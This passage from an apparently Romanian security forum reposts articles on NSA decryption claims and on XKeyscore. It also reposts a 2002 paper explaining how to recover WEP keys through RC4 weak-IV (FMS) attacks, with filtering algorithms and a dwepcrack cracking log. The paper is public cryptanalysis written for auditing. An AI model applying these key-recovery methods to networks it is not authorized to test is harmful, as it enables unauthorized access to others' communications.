uniform random strings. Slides: http://cr.yp.to/talks/2013.05.31/slides-dan+tanja-20130531-4x3.pdf Paper: http://cr.yp.to/elligator/elligator-20130527.pdf
  10. Nytro

    cumpar root

    Exista categoria RST Market.
  11. Nu imi dau seama din poze despre ce e vorba. Am si eu banca de abdomene, am dat cred ca vreo 80 RON pe ea, probabil cea mai ieftina, ceva "Active". Nu cred ca te ajuta prea mult daca se inclina sau nu. Practic, cele mai ok abdomene nu le faci pe banca, le faci culcat si cu picioarele la 90 de grade.
  12. Ce parere aveti? Fiind pe 128 de biti avem: 4 mld * 4 mld * 4 mld * 4 mld de chei. Adica un numar cu 36 de cifre. [340.282.366.920.938.463.463.374.607.431.768.211.456] Pare destul de greu sa incerci atatea combinatii, chiar si pentru milioane de procesoare/GPU. Sa presupunem ca putem sparge 2^64 [18.446.744.073.709.551.616], adica 18 miliarde de miliarde de chei pe secunda. Raman insa tot atatea secunde de crackuit... Deci un atac bruteforce, matematic, pica. Insa exista mai multe atacuri: https://en.wikipedia.org/wiki/RC4#Security Ma intereseaza in mod special pentru SSL. Google, Facebook, Twitter si probabil multe altele folosesc SSL cu RC4 pe 128 de biti, despre care, in ziua de azi, se zice ca e slab/foarte slab. Voi ce parere aveti? As dori niste argumente tehnice. Daca veniti si cu niste paper-uri e perfect.
  13. NSA's (and GCHQ) Decryption Capabilities: Truth and Lies by Axelle Apvrille | September 06, 2013 Edward Snowden has revealed new information concerning the cryptographic capabilities of the NSA and GCHQ (TheGuardian, ProRepublica, leaking documents…). The CryptoGirl was bound to look into that topic Let’s go straight to the point and answer simple questions. Is cryptography unsecure? No, I don’t think so. Basically, cryptography is maths (prime numbers, finite fields, polynomials…), and maths are solid science with proofs and demonstrations. Cryptographic algorithms are only seldom broken (e.g MD5). What’s quite often “broken” are implementations, because implementations are imperfect representation of maths. Vulnerabilities range from implementations bugs (buffer overflows etc) to side channel attacks (i.e attacks based on the physical properties of the implementation such as differential power analysis, timing attacks…). Don’t believe me? This opinion of mine is backed by Bruce Schneier, who had access to NSA’s documents: ”They’re doing it primarily by cheating, not by mathematics.”. Yes, but they seem to be able to defeat SSL! Yes. Note that SSL is a security protocol, not a cryptographic algorithm. The documents released by Snowden confirms our fears regarding SSL. As we said in our previous blog, we believe they do it by getting private keys of given domains or performing man-in-the-middle attacks. They could also be using attacks such as BEAST, CRIME) or BREACH. SSL is so widely deployed that there is much peer review of the protocol (good), but also new vulnerabilities are exposed each year at security conferences. It seems quite likely that the NSA is aware of those vulnerabilities, perhaps even with a few 0-days. enigma crypto rotor Image courtesy of LaMenta3 via Flickr. Matthew Green says Microsoft CryptoAPI and OpenSSL are probably among the SSL libraries the NSA is the most likely to break into, and I agree with him. In particular, a few years ago I remember that OpenSSL checked certificate chains only up to 9 levels. Certificates for a given entity are issued by a higher authority, and the higher authority’s certificate is issued by an even higher authority. That’s the chain of trust. So, if you have 10 certificates in your chain, OpenSSL was unable to check the chain and you might claim to be God and would be trusted This was a documented issue, I haven’t checked if it has been fixed since. By the way, Bruce Schneier recommends usage of TLS (for those who don’t know, TLS is like “SSL 3.1”, it’s a newer version of SSL). It’s certainly better than SSL in terms of security, but I wouldn’t bet on it as there are (nearly) as many vulnerabilities. The NSA has supercomputers and excellent cryptographers. They can break the RSA algorithm I agree with the first sentence and disagree with the second Sure, they have powerful computers and cryptographers, but that’s not enough to break the RSA algorithm with 2048-bit keys (for instance, this is used in GPG). You need huge computational power to brute force RSA 2048. Currently, the RSA Factoring Challenge record is set to RSA 768, and that’s already tremendous work. I don’t think the NSA can do much better, and I don’t think they have better cryptographers than those of the entire world. People like Shamir, Rivest, Lenstra, Preneel, Coron, Boneh etc are just exceptional, and I would not think the NSA can influence such a diverse panel of scientists. In the specific case of RSA, however, note that improper usage or implementations may be insecure. For instance, signing with RSA 1024 with PKCS#1 and a low exponent is not safe. So, if you use your crypto library (OpenSSL, BouncyCastle etc) with those settings, too bad. Note that it’s not that RSA 1024 is insecure, but that particular combination. All cryptographic algorithms are designed to work in a specific well-designed context. If you use them outside that context, their security may fall apart. As developers say, RTFM The slides say they can do it! No. The information I read in the Guardian’s article in no way states the NSA has the ability to break RSA, nor AES etc. They say that “cryptanalytic capabilities are now coming on line” or that they have “groundbreaking capabilities”, which is far too vague. True, I haven’t had access to the full set of slides, so I might be missing something important. However, still, I would not trust those slides fully. Why? Because they don’t sound like technical slides from a cryptographer. Would a cryptographer write he has “groundbreaking capabilities”? No. That’s not the way cryptographers talk. They’d rather say “Breakable in o(2^n)” or something like that For me, the slides emanate from some high level manager. I guess all of us have already seen slides of products which actually do not really correspond to reality, huh? The NSA influences standards and puts backdoors in applications Yes, I believe this is possible. Matthew Green summarized it very well: “Cryptographers have always had complicated feelings about NIST, and that’s mostly because NIST has a complicated relationship with the NSA.” I however wonder exactly which 2006 standard the Guardian refers to. My guess would be that the same applies to (some) RFCs and IEEE standards such as P1363. Elliptic curve choices are indeed somewhat obscure and could typically have been influenced by the NSA. This is also in line with Bruce Schneier’s recommendation “Prefer conventional discrete-log-based systems over elliptic-curve systems; the latter have constants that the NSA influences when they can.” As for putting backdoors into programs, to some extent, I can personally guarantee this is true - and not only in the US! Some 15 years ago (waow…), I was a junior developer working on quite well-known encryption product. To comply with the French law and be able to commercialize the product, we had absolutely no other choice than to embed a backdoor for the French government. That backdoor enabled them to decrypt the session key and hence any document encrypted with the tool. I remember the product featured a label like “Approved by SCSSI” (French’s former SSI entity) which, in practice, meant it held the backdoor. In France, laws around cryptography are now less restrictive, but this is just to say I would not be surprised the US asks for key escrows. What tools can I use? Bruce Schneier provides several recommendations. See also this document. It’s also worth to have a look at Prism-break. I complement them with a table below of what I think - personal opinion - is secure or not. Unfortunately, “green” does not mean it is guaranteed to be secure. For instance, the implementation may be flawed. But it’s better than orange… – the Crypto Girl Sursa: Fortinet Blog | News and Threat Research NSA's (and GCHQ) Decryption Capabilities: Truth and Lies + https://www.schneier.com/blog/archives/2013/09/conspiracy_theo_1.html
  14. Practical Exploitation of RC4 Weaknesses in WEP Environments Practical Exploitation of RC4 Weaknesses in WEP Environments February 22, 2002 by David Hulton <h1kari@dachb0den.com> - (c) Dachb0den Labs 2002 [http://www.dachb0den.com/projects/bsd-airtools.html] 1. Introduction This document will give a brief background on 802.11b based WEP weaknesses and outline a few additional flaws in rc4 that stem off of the concepts outlined in "Weaknesses in the Key Scheduling Algorithm of RC4" (FMS) and "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP" (SIR) and describes specific methods that will allow you to optimize key recovery. This document is provided as a conceptual supplement to dweputils, a wep auditing toolset, which is part of the bsd-airtools package provided by Dachb0den Labs. The basic goal of the article is to provide technical details on how to effectively implement the FMS attack so that it works efficiently with both a small amount of iv collection time as well as cracking and processing time and to provide details on how other pseudo random generation algorithm (prga) output bytes reveal key information. 2. Background WEP is based on RSA's rc4 stream cipher and uses a 24-bit initialization vector (iv), which is concatenated with a 40-bit or 104-bit secret shared key to create a 64-bit or 128-bit key which is used as the rc4 seed. Most cards either generate the 24-bit iv using a counter or by using some sort of pseudo random number generator (prng). The payload is then encrypted along with an appended 32-bit checksum and sent out with the iv in plaintext as illustrated: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | | 802.11 Header | | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | IV[0] | IV[1] | IV[2] | Key ID | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . SNAP[0] . . . . . | . . . . . SNAP[1] . . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . SNAP[2] . . . . . | . . . . Protocol ID . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | | . . . . . . . . . . . . . Payload . . . . . . . . . . . . . . | | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . . . . . . 32-bit Checksum . . . . . . . . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ . - denotes encrypted portion of packet After the data is sent out, the receiver simply concatenates the received iv with their secret key to decrypt the payload. If the checksum checks out, then the packet is valid. 2.1. Current Cracking Methods Essentially, most of the wep attacks out there these days are either based on brute forcing methods, often times including optimizations based on how the key is generated or by using a wordlist, or through statistical analysis of initialization vectors (ivs) and their first rc4 output byte, to setup conditions in the rc4 key scheduling algorithm (ksa) that reveal information about particular bytes in the secret key. 2.1.1. Brute Forcing Brute forcing has been proven to be an effective method of breaking wep, mainly thanks to all of the work done by Tim Newsham. This method basically consists of trying to decrypt the encrypted payload of a captured 802.11b packet using a set of keys and verifying the validity by seeing if the 32-bit checksum checks out. In most cases, if the key checks out it is important to check it with another packet to make sure the key is actually valid, since many times the packet can be decrypted with an invalid key and the checksum will be valid. This mode of attack generally only requires 2 packets. Tim Newsham's most effective cracking method stems off of the weaknesses in the password based key generation algorithm used by most 40-bit cards and access points. By taking advantage of this weakness, it reduces the 40-bit keyspace down to 21-bit, which is trivial to crack (20-40 seconds with most current-day machines). Also, wordlist attacks prove almost equally effective on both 40-bit and 104-bit 802.11b networks, provided you have a decent list of commonly used passphrases. Even without using these optimizations, you can still exhaust the entire 40-bit keyspace in roughly 45-days on a decent machine, or in a very reasonable amount of time using a distributed network of machines. Although this mode of attack can be applied to many networks out there, it fails to be able to attack a properly secured 104-bit network, since the amount of time required to brute force 104-bit is generally longer than an attacker's great-grandchildren would want to wait. 2.1.2. FMS Attack Up until now, all open source wep cracking utilities that use the FMS Attack have used an extremely limited mode of operation as described in FMS in Section 7.1 "IV Precedes the Secret Key", and is also published by Wagner in Wag95, which involves only looking for ivs that match: (A + 3, N - 1, X) This is a particular condition that works almost all of the time and is not dependent on the preceding keys. However, as described later on in FMS in Section A "Applying The Attack to WEP-like Cryptosystems", they recommend that you use the following equation on the S permutation immediately after the KSA to determine if an iv is weak: X = S{B + 3}[1] < B + 3 X + S{B + 3}[X] = B + 3 This equation uncovers many more ivs than the 256 per key that most implementations currently use. This was made obvious in SIR in Section 4.1 "Choosing IVs", but wasn't thoroughly expanded on about how to effectively use a pool of logged ivs to successfully perform this attack in a reasonable amount of time. The main dilemmas with applying this equation to all of the IVs that you collect are that you have to check all of your logged ivs at least once for every key byte that you try, and that it takes a considerable amount of resources to apply this algorithm to a set of 2,000,000 ivs. So, not only do you have to do a large amount of processing, but also for an extremely large set of possibilities. Also, all of the current implementations only attack the 1st rc4 output byte, mainly because it is the one that provides the most accurate information about the key bytes. However, by attacking the other bytes, it can also provide clues, although minute, to the static key that was used. This can sometime provide enough statistical data to derive key bytes in cases when you aren't able to collect a large amount of captured data, and have more time to spend processing. 3. Additional Flaws in the KSA The main flaw with rc4 that hasn't been thoroughly expanded, is using information provided by other bytes in the prga output stream. This attack is similar to the FMS attack, but requires additional processing because you have to also emulate portions of the pseudo random generation algorithm (prga) to determine if an iv gives out key information in byte A. However, the bytes that you can attack using this method directly depend on the bytes of the key you have already recovered and are extremely hard to predict without excessive processing. To demonstrate this, I will first provide background on the current common mode of attack which attacks the first output byte and then show how it can be expanded to other bytes. 3.1. Attacking the First Byte The first byte attack works based on the fact that you can simulate part of the ksa using the known iv and derive the values of elements in the S permutation that will only change 1 - (e ** -X) of the time, where X is the number of S elements that your attack depends on. This can be illustrated as follows when attacking the first byte in the secret key (SK): Definitions: KSA(K) Initialization: For i = 0 ... N - 1 S[i] = i j = 0 Scrambling: For i = 0 ... N - 1 j = j + S[i] + K[i mod l] Swap(S[i], S[j]) PRGA(K) Initialization: i = 0 j = 0 Generation Loop: i = i + 1 j = j + S[i] Swap(S[i], S[j]) Output z = S[S[i] + S[j]] - For demonstration purposes N = 16, although it is normally 256 - Also, all addition and subtraction operations are carried out modulo N and negative results are added with N so results are always 0 <= x < N. Simulation: let B = 0 - byte in K that we are attacking let IV = B + 3, f, 7 let SK = 1, 2, 3, 4, 5 let K = IV . SK let l = the amount of elements in K assume that no S elements get swapped when i > B + 3 KSA - K = 3, f, 8, 1, 2, 3, 4, 5 Known Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] K 3 0 i = 0, j = 0 + 0 + 3 = 3 0 1 i = 1, j = 3 + 1 + f = 3 d 2 i = 2, j = 3 + 2 + 8 = d Unknown Portion: f 1 i = 3, j = d + 1 + 1 = f - Note that S[B + 3] always contains information relating to SK[B], since SK[B] is used to calculate j. PRGA - S = 3, 0, d, f, 4, 5, 6, 7, 8, 9, a, b, c, 2, e, 1 Unknown Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] S[i] S[j] 3 0 d f 4 5 6 7 8 9 a b c 2 e 1 Unknown KSA Output 0 3 i = 1, j = 0 + 0 = 0, z = S[0 + 3] = f In this instance, f will be output as the first PRGA byte, which is in turn xor'ed with the first byte of the snap header. The first byte of the snap header is almost always 0xaa, so we can easily derive the original f by simply xor'ing the first byte in our encrypted payload with 0xaa. To reverse the f back into the first byte of the SK that was used to generate it, we just iterate through the KSA up until the point where we know the j and S[i] values that were used to derive the f as provided in the previous demonstration. Once the j and S[i] values are derived, we can easily reverse it to SK[B] as illustrated: Definitions: let S{-1}[Out] be the location of Out in the S permutation let Out be z in the first iteration of the PRGA assume values in Known Portion of KSA from where i = 2 SK[B] = S{-1}[Out] - j - S[i + 1] Application: SK[B] = S{-1}[f] - c - S[3] = f - d - 1 = 1 This method provides us with the correct key roughly e ** -3 =~ 5% of the time, and sometimes e ** -2 =~ 13% of the time in some cases when we only rely on 2 elements in the S permutation staying the same. As you can see in the ksa and prga simulation above, we only rely on elements 0, 1, and 3 not changing for the output byte to be reliable, so the probability of our output byte being f is 5%. By collecting many different SK[B] values the correct SK[B] values should become more evident as more data is collected. Additionally, once we determine the most probable value for the first byte in the secret key, we can apply the same algorithm to cracking the next byte in the secret key, and continue until we have cracked the entire secret key. In most implementations this method is combined with brute forcing so the odds don't have to be perfect in order to recover the key. 3.2. Attacking Additional Output Bytes This section will demonstrate a set of new unique ivs that provide clues to various bytes in the secret key and in some cases with greater probability than the first bytes. I will first demonstrate what happens when rc4 encounters one of these ivs, and then provide methods for detecting them. 3.2.1. RC4 Encounters a 2nd-Byte Weak IV In this demonstration, I will use a weak iv that attacks the 2nd byte and show how certain ivs setup the S permutation so that secret key information is revealed in the 2nd byte of output. This method also applies to other output bytes and can be expanded depending on which secret key byte you are attacking. Here is what happens: Simulation: let B = 0 - byte in K that we are attacking let IV = 4, c, c let SK = 1, 2, 3, 4, 5 let K = IV . SK assume that no S elements get swapped when i > B + 3 KSA - K = 4, c, c, 1, 2, 3, 4, 5 Known Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] K 4 0 i = 0, j = 0 + 0 + 4 = 4 1 i = 1, j = 4 + 1 + c = 1 f 2 i = 2, j = 1 + 2 + c = f Unknown Portion: 3 i = 3, j = f + 3 + 1 = 3 PRGA - S = 4, 1, f, 3, 0, 5, 6, 7, 8, 9, a, b, c, d, e, 2 Unknown Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] S[i] S[j] 4 1 f 3 0 5 6 7 8 9 a b c d e 2 Unknown KSA Output 1 i = 1, j = 0 + 1 = 1, z = S[1 + 1] = f f 4 i = 2, j = 1 + f = 0, z = S[f + 4] = 3 Then, since we also often times know that the second byte of the snap header is 0xaa, we can determine the 2nd byte of prga output and reverse it back to the original key, as demonstrated: SK[B] = S{-1}[3] - f - S[3] = 3 - f - 3 = 1 As you can see, this particular iv will setup the ksa and prga so that the second output byte provides information about the first byte of our key in almost every situation. Additionally, it relies on elements 0, 1, 2, and 3 not changing for the second byte to be accurate, so it will only be correct e ** -4 =~ 2% of the time. Additionally, in cases where the previous output bytes are derived from dependent elements, we can check to see if the actual outputted byte matches up and determine if the output we are receiving has been tampered with. In addition, if the output matches up, it greatly increases our odds since we now rely on less elements. In this particular case, if the first output byte checked out, it would increase our probability with the 2nd byte to e ** -2 =~ 13%. 3.2.2. Finding Weak IVs for Additional Output Bytes The main problem with attacking additional output bytes is determining if an iv will reveal part of the secret key in a particular output byte, and also determining if the probabilities are good enough to even consider it. How we can detect if an iv is vulnerable to this sort of attack is similar to the first byte attack, but it requires looping through the prga up until i = (A + 1) where A = the offset in the prga stream of the byte you know the value for. For each iteration of the prga loop, if there are any instances where j or i >= B + 3, we must discard the iv, since then we are relying on elements in the S permutation that will most likely change. This can be accomplished by modifying the prga algorithm so that it is similar to: PRGA(K) Initialization: For i = 0 ... N - 1 P[i] = 0 P[B + 3] = 1 i = 0 j = 0 Generation Loop: While i < A + 1 i = i + 1 j = j + S[i] If i or j >= B + 3 Then Fail Swap(S[i], S[j]) Output z = S[S[i] + S[j]] P[i] = 1 P[j] = 1 Verification: If S[i] + S[j] = B + 3 Then Success Probability Analysis: j = 0 For i = 0 ... N - 1 If P[i] > 0 Then j = j + 1 This algorithm also works almost identically to the equation for determining if an iv is vulnerable to the first byte attack and can be expanded to detecting ivs that reveal keys in any byte in the prga output. You can then weigh the probabilities and determine if it is worth considering. In tests, this method doesn't prove entirely useful, mainly due to the amount of processing that is required to determine if certain ivs have this property. Since each iv has to be checked for each previous secret key byte that you try, it would probably be most practical to manually derive a table of vulnerable ivs, so it doesn't require much work during key recovery. In most cases it'd be more practical to collect more ivs and only use the first bytes to perform key recovery, however in cases when you have a limited set of sample data, it could greatly reduce the time required for recovery. 4. Implementation This section will focus on practical methods for making use of all of the 1st byte weak ivs without hindering performance. It will also cover optimizations for applying brute forcing and fudging methods to greatly reduce cracking time. The result of the optimizations will allow you to perform key recovery with only 500,000-2,000,000 packets and < 1 minute processing time. Although, in SIR it is mentioned that they were able to crack wep with a similar number of packets, this mode of attack does not require that the wep key be ascii characters, and isn't dependent on what key generator the victim used. 4.1. Filtering Weak IVs The main problem with attacking wep using all of the first byte weak ivs, is that the equation specified in FMS has to be applied to each of the ivs for every key that you try. Since often times you'll have a total of 2,000,000 packets that you've collected and thousands of keys you need to try before you find the correct one. It has thus far been impractical to use this mode of attack, since it requires a large amount of memory as well as resources. The way I have managed to get around this dilemma is by analyzing the patterns of weak ivs and how they are related to the key bytes they rely on. This is the basic pattern that I've found. Definitions: let x = iv[0] let y = iv[1] let z = iv[2] let a = x + y let b = (x + y) - z Byte 0: x = 3 and y = 255 a = 0 or 1 and b = 2 Byte 1: x = 4 and y = 255 a = 0 or 2 and b = SK[0] + 5 Byte 2: x = 5 and y = 255 a = 0 or 3 and b = SK[0] + SK[1] + 9 a = 1 and b = 1 or 6 + SK[0] or 5 + SK[0] a = 2 and b = 6 Byte 3: x = 6 and y = 255 a = 0 or 4 and b = SK[0] + SK[1] + SK[2] + 14 a = 1 and b = 0 or SK[0] + SK[1] + 10 or SK[0] + SK[1] + 9 a = 3 and b = 8 Byte 4: x = 7 and y = 255 a = 0 or 5 and b = SK[0] + SK[1] + SK[2] + SK[3] + 20 a = 1 and b = 255 or SK[0] + SK[1] + SK[2] + 15 or SK[0] + SK[1] + SK[2] + 14 a = 2 and b = SK[0] + SK[1] + 11 or SK[0] + SK[1] + 9 a = 3 and b = SK[0] + 11 a = 4 and b = 10 This pattern can then be easily expanded into an equation that covers a range independent of what SK values you have. As a result, you have distribution pattern similar to the one shown below: Secret Key Byte 0 1 2 3 4 5 6 7 8 9 a b c + + + + + + 0 8 16 16 16 16 16 16 16 16 16 16 16 16 1 8 16 16 16 16 16 16 16 16 16 16 16 2 16 8 16 16 16 16 16 16 16 16 16 a 3 16 8 16 16 16 16 16 16 16 16 4 16 8 16 16 16 16 16 16 16 V 5 16 8 16 16 16 16 16 16 a 6 16 8 16 16 16 16 16 l 7 16 8 16 16 16 16 16 u 8 16 8 16 16 16 16 e 9 16 8 16 16 16 s a 16 8 16 16 b 16 8 16 c 16 8 d 16 8 - 8-bit set of weak ivs 16 - 16-bit set of weak ivs + - 2 additional x and y dependent 8-bit weak ivs From this, we can determine a rough estimate of how many total weak ivs exist for each key byte. It can also be determined using the following equation: let ? : be conditional operators let MAX(x, y) be x > y ? x : y ((B mod 2 ? MAX(B - 2, 0) + 2 : B + 1) * (2 ** 16)) + (((B mod 2 ? 0 : 2) + (B > 1 ? 1 : 0) + 1) * (2 ** 8)) However, our real objective is to determine an algorithm that allows us to filter out weak ivs based on the secret key byte that they can attack, so that we can narrow our 2,000,000 element table down to a reasonable size that's easier to search. This can be accomplished by using a simple algorithm similar to: let l = the amount of elements in SK i = 0 For B = 0 ... l - 1 If (((0 <= a and a < or (a = B and b = (B + 1) * 2)) and (B % 2 ? a != (B + 1) / 2 : 1)) or (a = B + 1 and (B = 0 ? b = (B + 1) * 2 : 1)) or (x = B + 3 and y = N - 1) or (B != 0 and !(B % 2) ? (x = 1 and y = (B / 2) + 1) or (x = (B / 2) + 2 and y = (N - 1) - x) : 0) Then ReportWeakIV This algorithm results in catching the following distribution of ivs: Byte # of IVs Probability 0 768 0.00004578 1 131328 0.00782776 2 197376 0.01176453 3 197120 0.01174927 4 328703 0.01959223 5 328192 0.01956177 6 459520 0.02738953 7 459264 0.02737427 8 590592 0.03520203 9 590336 0.03518677 a 721664 0.04301453 b 721408 0.04299927 c 852736 0.05082703 Which should differ slightly from the previous weak iv estimation equation since some ivs in the pattern overlap. By sorting these IVs into tables, you can very easily narrow down the amount of ivs to search for each cracking operation to a maximum of 852,736 ivs, or around only 101,654 when supplied with a 2,000,000 packet capture file. This effectively reduces the search time for each key by at least 1/20. 4.2. Fudging When trying to recover keys using a capture file that doesn't statistically provide enough immediate information to determine the secret key, it is common to perform a brute force based on the most probable key bytes. Up until now the fudge, or breadth, has been implemented as a static number that specifies the range to search for each key byte. However, with > 2,000,000 samples and a large amount of weak ivs for each byte the probability that the correct key will be the most probable gets greater as you traverse through each byte. A estimate of the probabilities for this are outlined below: Byte # of IVs Probability 0 768 0.00004578 1 768 0.00004578 2 2304 0.00013732 3 1792 0.00010681 4 3072 0.00018311 5 2560 0.00015259 6 4096 0.00024414 7 3584 0.00021362 8 5120 0.00030518 9 4608 0.00027466 a 6144 0.00036621 b 5632 0.00033569 c 6656 0.00039673 Therefore, when attempting to brute force based on a 2,000,000 sample set, your IVs will most likely be near: Byte # of IVs # of Correct Keys 0 92 5 1 92 5 2 275 14 3 214 11 4 366 18 5 305 15 6 488 24 7 427 21 8 610 30 9 549 27 a 732 36 b 671 33 c 793 39 Therefore, it's most likely that once you reach byte 2, the key that seems most probable, most likely is. This means that fudging is most likely not required, or at the least should be reduced, the farther you move through the bytes. This reduces the brute forcing time required considerably, since now it is only necessary to fudge the first few bytes of the key, and the rest is no longer necessary. I have found in most cases, because of this property of weak ivs, it requires quite less packets than 2,000,000 to recover the key, and in some cases you don't even require any statistics for the first couple bytes of the secret key to perform this attack in a very reasonable amount of time. 5. Results Using the outlined modifications, I've managed to crack wep using between 500,000 and 2,000,000 packets in under a minute, this is mainly due to the time required for reading in the packets. Here is an example of a successful attack using quite less than the 60 required ivs and only ~ 500,000 packets: h1kari@balthasar ~/bsd-airtools/dweputils/dwepcrack$ ./dwepcrack -w ~/log * dwepcrack v0.3a by h1kari <h1kari@dachb0den.com> * * Copyright (c) Dachb0den Labs 2002 [http://dachb0den.com] * reading in captured ivs, snap headers, and samples... done total packets: 500986 calculating ksa probabilities... 0: 22/768 keys (!) 1: 3535/131328 keys (!) 2: 5459/197376 keys (!) 3: 5424/197120 keys (!) 4: 9313/328703 keys (!) (!) insufficient ivs, must have > 60 for each key (!) (!) probability of success for each key with (!) < 0.5 (!) warming up the grinder... packet length: 44 init vector: 58:f7:26 default tx key: 0 progress: .................................... wep keys successfully cracked! 0: xx:xx:xx:xx:xx * done. 6. Conclusions The best solution for securing your wireless networks is using traditional wireless security to its fullest, but not relying on it. Manually enter in your wep keys and don't use the key generator (or use dwepkeygen ;-Q), change your wep keys frequently, use mac filtering and shared key authentication, and label your wireless network as untrusted (and no, I don't necessarily mean set your ssid to "untrusted"). Wireless networks, just like any other networks, are proportionately insecure to the stupidity of the person managing them. References [1] Fluhrer, S. Mantin, I. and Shamir A. - Weaknesses in the Key Scheduling Algorithm of RC4. [2] Stubblefield, A. Ioannidis, J. and Rubin, A. - Using the Fluhrer, Mantin, and Shamir Attack to Break WEP [3] Newsham, T. - Cracking WEP Keys. Presented at Blackhat 2001. Sursa: http://www.dartmouth.edu/~madory/RC4/wepexp.txt
  15. XKeyscore: NSA’s Surveillance Program Bhavesh Naik September 09, 2013 Introduction The former contractor for NSA, Edward Snowden, became famous for revealing PRISM, a confidential mass surveillance program run by the U.S. agencies to eavesdrop on any electronic media. The whole world realized that Big Brother is real and, yes, he is watching you. It is not a fiction any longer. So what is XKeyscore, exactly? It’s a tool that can scour all things from the Internet for surveillance purposes. The purpose of XKeyscore is to allow analysts to search the metadata as well as the contents of email and other Internet activity, such as browser history. Analysts can also search by name, telephone number, IP address, keywords, and the language in which the Internet activity was conducted or the type of browser used. According to the slides published, XKeyscore is: DNI (digital network intelligence) exploitation system/analytic framework Performs strong (e.g., email) and soft (e.g., content) selection. In an interview in June, Edward Snowden elaborated on his statement about being able to read any individual’s email if he had their email address. He said the claim was based in part on the email search capabilities of XKeyscore, which Snowden says he was authorized to use while working as a Booz Allen contractor for the NSA. One of the top-secret documents describe how the program searches within the “bodies of emails, web pages and documents,” including the “To, From, CC, BCC lines” and “Contact-Us” pages on websites. Provides real-time activity Beyond emails, the XKeyscore system allows analysts to monitor a virtually unlimited array of other Internet activities, including those within social media. The DNI presenter enables an analyst using this tool to read the content of Facebook chats or private messages. “Rolling buffer” of ~3 days of ALL unfiltered data seen by XKeyscore: Stores full-take data at the collection site, indexed by meta-data Provides a series of viewers for common data types [*]Federated query system—one query scans all sites Performs full-take, allowing analysts to find targets that were previously unknown by mining metadata. Revealing When and Where? The program’s existence was most publicly revealed in July 2013 by Edward Snowden in The Sydney Morning Herald and O Globo newspapers. What Was Snowden’s Statement? “I, sitting at my desk, (can) wiretap anyone, from you or your accountant, to a federal judge or even the president, if I had a personal email address.” The Guardian (June 10). Legal vs. Technical Restrictions The FISA Amendments Act (2008) requires a warrant for targeting U.S. individuals, but NSA analysts are permitted to intercept the communications of such individuals without a warrant if they are in contact with one of the NSA’s foreign targets. The ACLU’s deputy legal director, Jameel Jaffer, told The Guardian that national security officials expressly said that a primary purpose of the new law was to enable them to collect large amounts of communications by Americans without individual warrants. The following example is provided by one XKeyscore document showing a NSA target in Tehran communicating with people in Frankfurt, Amsterdam, and New York. The working What can it do? According to The Washington Post and Marc Ambinder, editor of The Week, XKeyscore is a data retrieval system that consists of a series of interfaces, backend databases, software, and servers that select certain type of metadata that NSA has already collected, using other methods from wide range of different sources. F6, which is the SCS or special collection service, operating from a U.S embassy or consulate overseas. FORNSAT, which means “foreign satellite collection,” refers to intercepts from satellites that process data used by other countries. The special source operations, or the SSO, is a branch of NSA that taps cables, finds microwave paths, and otherwise collects data not generated by F6 or foreign satellites. A training slide on page 24 of the National Security Agency’s 2008 presentation on the program, states it quite baldly: Show me all exploitable machines in country X Fingerprints from TAO (tailored access operations) are loaded into XKeyscore’s application/fingerprinted engine. Data is tagged and databased. No strong-selector. Complex Boolean tasking and regular expression required. According to Ars Technica’s Sean Gallagher, “the vulnerability fingerprints are added to serve as a filtering criteria for XKeyscore’s app engines, comprised of a worldwide distributed cluster of Linux servers attached to the NSA’s Internet backbone tap points.” He explains how this could give the NSA a toehold of surveillance in various countries: “This could allow the NSA to search broadly for systems within countries such as China or Iran by watching for the network traffic that comes from them through national firewalls, at which point the NSA could exploit those machines to have a presence within those networks.” The slides explain how XKeyscore can track encrypted virtual private networks (VPN) sessions and their participants, can capture metadata on who’s using PGP (pretty good privacy) in email or who is encrypting their Word documents, which later can be decrypted. It keeps all trapped Internet traffic for three days, but the metadata is kept for up to 30 days. This one-month duration allows the authorities the time to trace the identity of those who created the documents. Further capabilities include Google Maps and web searches. It also has the ability to track the authorship and source of a particular document. Location Where is XKeyscore located? It works with the help of over 700 servers based in U.S. and allied military and other facilities as well as U.S. embassies and consulates in several dozen countries. Data Collection and Storage How much data is being collected? The quantity of communications accessible through programs such as Xkeyscore is staggeringly large. One NSA report from 2007 estimated that there were 850 billion “call events” collected and stored in the NSA database and close to 150 billion Internet records. Each day, the document says, 1 – 2 billion records were added. A 2010 Washington Post article reported that “everyday, collection systems at the [NSA] intercept and store 1.7 billion emails, phone records and other type of communications.” How long is the data stored? The XKeyscore system is collecting a vast amount of Internet data that can be stored only for short periods of time. Content remains on the system for three to five days. The metadata on the other hand is stored for 30 days. One document explains: “At some sites, the amount of data we receive per day (20 plus terabytes) can be only stored for as little as 24 hours.” In 2012, there were at least 41 billion records collected and stored in XKeyscore for a single 30 days of duration. What was NSA’s response? In a statement to The Guardian, the NSA said: “NSA’s activities are focused and specifically deployed against—and only against—legitimate foreign intelligence targets in response to requirements that our leaders need for information necessary to protect our nation and its interests. “XKeyscore is used as a part of NSA’s lawful foreign signals intelligence collection system. “Allegations of widespread, unchecked analyst access to NSA collection data are simply not true. Access to XKeyscore, as well as all of NSA’s analytic tools, is limited to only those personnel who require access for their assigned tasks … In addition, 